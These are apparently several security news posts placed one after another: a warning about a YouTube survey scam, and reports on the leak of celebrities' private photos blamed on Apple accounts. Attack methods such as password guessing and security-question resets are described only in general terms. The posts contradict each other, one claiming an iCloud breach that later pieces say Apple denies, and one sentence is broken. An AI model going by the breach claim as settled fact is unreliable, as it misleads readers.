You can see examples of this on posts made by puzzled YouTubers over on Instagram [1], [2], Yahoo [1] and a few more people complaining about it in Google Groups.

This is what you would see after hitting the supplied link in the message:

“Complete a survey to verify your account”

This one is a survey scam, and whoever is sending these messages is looking to make a little cash along with the panic they’re no doubt whipping up in YouTube users right about now.

The links displayed on the left hand side are regional and will take clickers to various offers / surveys / signups and downloads.

If you’re in any doubt as to the status of your YouTube account, you’d be better served contacting them directly than being tricked by these false messages currently in circulation. Scammers will often use similar tactics to send phishing links and malware, so in some ways recipients of this missive are getting the best of a bad deal – it’s “only” surveys and forms to fill in, along with the occasional download.

However, that doesn’t mean we should rush to jump through their survey sign-up hoops either.

Steer clear of this one, and keep on making those videos.

Apple Not Hacked In Celebrity Nude Photo Breaches

"Very targeted attack" on celebrities' Apple usernames, passwords, security questions -- iCloud, Find My iPhone not breached, Apple says.

This afternoon, Apple confirmed that stolen and leaked private photos of several celebrities were not due to a breach in its iCloud nor Find My iPhone services. Speculation swirled over just how the attackers accessed the accounts of Jennifer Lawrence, Jenny McCarthy, Rihanna, Kate Upton, Mary E Winstead, and others.

A trove of naked photos and video content stolen from the stars appeared on the 4Chan chatroom site over the weekend. Questions about how the hackers got hold of the celebs' accounts began to center around a possible flaw in Apple's iCloud and Find My iPhone after Apple reportedly issued an update that fixed a hole that would allow a brute-force password attack.

In a statement issued today, Apple said:

"When we learned of the theft, we were outraged and immediately mobilized Apple's engineers to discover the source. Our customers’ privacy and security are of utmost importance to us. After more than 40 hours of investigation, we have discovered that certain celebrity accounts were compromised by a very targeted attack on user names, passwords and security questions, a practice that has become all too common on the Internet. None of the cases we have investigated has resulted from any breach in any of Apple’s systems including iCloud or Find my iPhone. We are continuing to work with law enforcement to help identify the criminals involved."

Apple recommends users create strong passwords and use two-factor authentication, which is an option for Apple ID accounts. Apple did not comment on the reported flaw nor did it respond to questions about it via a media inquiry.

One security expert says he tested whether AppleID would lock him out after a certain number of attempts after hearing about the possible patch by Apple: It did. "After ten attempts, it locked me out," says Rik Ferguson, global vice president of security research at Trend Micro. He was unable to confirm whether Apple's authentication service had always done so, or whether this was due to a fix by Apple in the wake of the celeb hacks.

Either way, brute-forcing would require knowing the email address of the target, he says.

It's not surprising that most consumers and celebrities don't opt for the second factor of authentication since it's not required, experts say. And weak passwords most likely played a major role in the attack, they say.

"This breach could have been prevented if iCloud required users to use a two-factor authentication to access their accounts. This will require users to enter a numerical code that is sent to their phone or another device, in addition to using their regular password," says Vijay Basani, CEO of EiQ Networks. "Since numerical code always changes, it makes it difficult for the hackers to gain access [and breach the account], even if they can guess the password."

Apple denies its services were hacked

“Celebgate” -as the theft and publication of private photos of more than 100 actresses and models has come to be known – is not only affecting the direct victims of the theft but also the companies that have been implicated in the affair.

Initially, it was thought that the leaks could be due to a potential security hole in iCloud, Apple’s virtual storage platform, but the company has announced that, after a 40-hour investigation, they have discovered that the accounts of these celebrities “were compromised by a very targeted attack on user names, passwords and security questions.” Adding that these attacks have “become all too common on the Internet.”

Apple denies that the hacking of the accounts of actresses such as Jennifer Lawrence, Kirsten Dunst and Kate Upton was the consequence of a vulnerability in its iCloud or ‘Find my iPhone‘ services. Although some of the victims have already had their say on the issue.


The company has also announced that it continues to work with the police to help identify the criminals involved and encourages all users to choose a strong password and double check their security systems.

Reported Apple iCloud Hack Leaked Hundreds of Nude Celebrity Photos

Now this gonna be the height of Privacy Breach! Nude images of several high-profile persona including actors, models, singers and presenters have been made available online in a blatant hacking leak linked to the Apple iCloud service.

The recent privacy breach appears to be one of the biggest celebrity privacy breaches in history and represents a serious offense and violation of privacy. A hacker allegedly breached Apple’s iCloud service and copied the personal photos of at least 100 high-profile stars.

WHO IS BEHIND IT

The anonymous hacker, using the name Tristan, sparked the scandal on Sunday after dumping a large cache of female celebrities' alleged naked photographs onto the 4chan online forum, an online message board used for sharing pictures.

The list of those celebrities allegedly affected, whose nudes photographs are supposedly in this cache, is very long that includes Jenny McCarthy, Rihanna, Kristin Dunst, Kate Upton, the American actress Mary E Winstead, and the Oscar winning actress Jennifer Lawrence. 

As a result of the leak, the nude photographs and videos of female celebrities are apparently being widely circulated on the internet. took to the ‘deep web’ where the images are thought to have first been posted a week ago to say he had to ‘move location’.

HOW ALL THIS BEGIN

The anonymous hacker behind the leaked images scandal posted a brief statement saying that they were going to bed because "s*** was getting real."

On Sunday evening, the anonymous user began posting the nude images of dozens of celebrities on 4chan website. It is still unclear how the photographs ended up online, but the anonymous hacker may have obtained more than 423 nude images of over a 100 celebrities without their permission.

Within hours Twitter was awash with hundreds of thousands of tweets about the photographs which are also alleged to include Brits Michelle Keegan, Cara Delevigne, Cat Deeley and Kelly Brook. 

CELEBS ADMITTED - SNAPS ARE REAL

The the 24-year-old Hunger Games and X-Men actress Jennifer Lawrence icluding several others have confirmed that the leaked photographs are genuine, while some celebrities have disputed the authenticity of the images.

The superstar Jennifer Lawrence's representative previously reported that Lawrence’s photographs were stolen, calling the hacking act as “a flagrant violation of privacy.” The spokesperson also added, “The authorities have been contacted and will prosecute anyone who posts the stolen photos of Jennifer Lawrence.”

Mary Elizabeth Winstead from Final Destination 3 was also been victim of the hack. The actress took to Twitter to react to having her images exposed.

HOW PHOTOGRAPHS WERE OBTAINED

It is believed that the leaked photographs of high-profile celebs were apparently obtained by the hackers via a massive hack of Apple's iCloud. The nude images then posted on 4chan websites by its users offering more explicit material in exchange for bitcoin payments.

The hacker on 4chan is also claiming to have over 60 nude selfies and an explicit sex film of the Oscar-winning actress, Jennifer Lawrence, which is available for a fee in Bitcoins.

NO RESPONSE FROM APPLE

Apple has declined to comment. It has not yet confirmed that its iCloud service was involved in the alleged leak.

The encryption of Apple on general data is considered to be robust, but access to it could be gained if an attacker is able to guess a users' passwords, which can be have obtained by using ‘brute force’ attack or ‘social engineering’ trick.

An account can alternatively be easily accessed by resetting a user's account by finding their email address and then answering traditional ‘security questions.’

Jennifer Lawrence: Victim of a security hole in iCloud?

If you are on Twitter you may have noticed the actress Jennifer Lawrence has been ‘Trending Topic’ since yesterday afternoon.

The reason? The leak of nude photos of the 2013 Academy Award winner on the /b/ forum of 4Chan.

She has confirmed the story, although she is apparently not the only victim.

Other models and actresses such as Kirsten Dunst, Kate Upton or Ariana Grande have also allegedly had pictures leaked, although not all these cases have been confirmed. Meanwhile, Mary E. Winstead has acknowledged the authenticity of the pictures that have been circulated, while Victoria Justice has denied that some photos allegedly of her are authentic.

It is still not clear how ‘Celebgate’ (as some are referring to this massive hacking) was carried out. Some sources have suggested a possible security breach in iCloud, Apple’s virtual data storage platform, though the company has yet to confirm this.

Until it is known how these images were stolen, the best anyone can do is apply common sense and ensure they use strong passwords to access their services. We also recommend that users check their Apple ID account.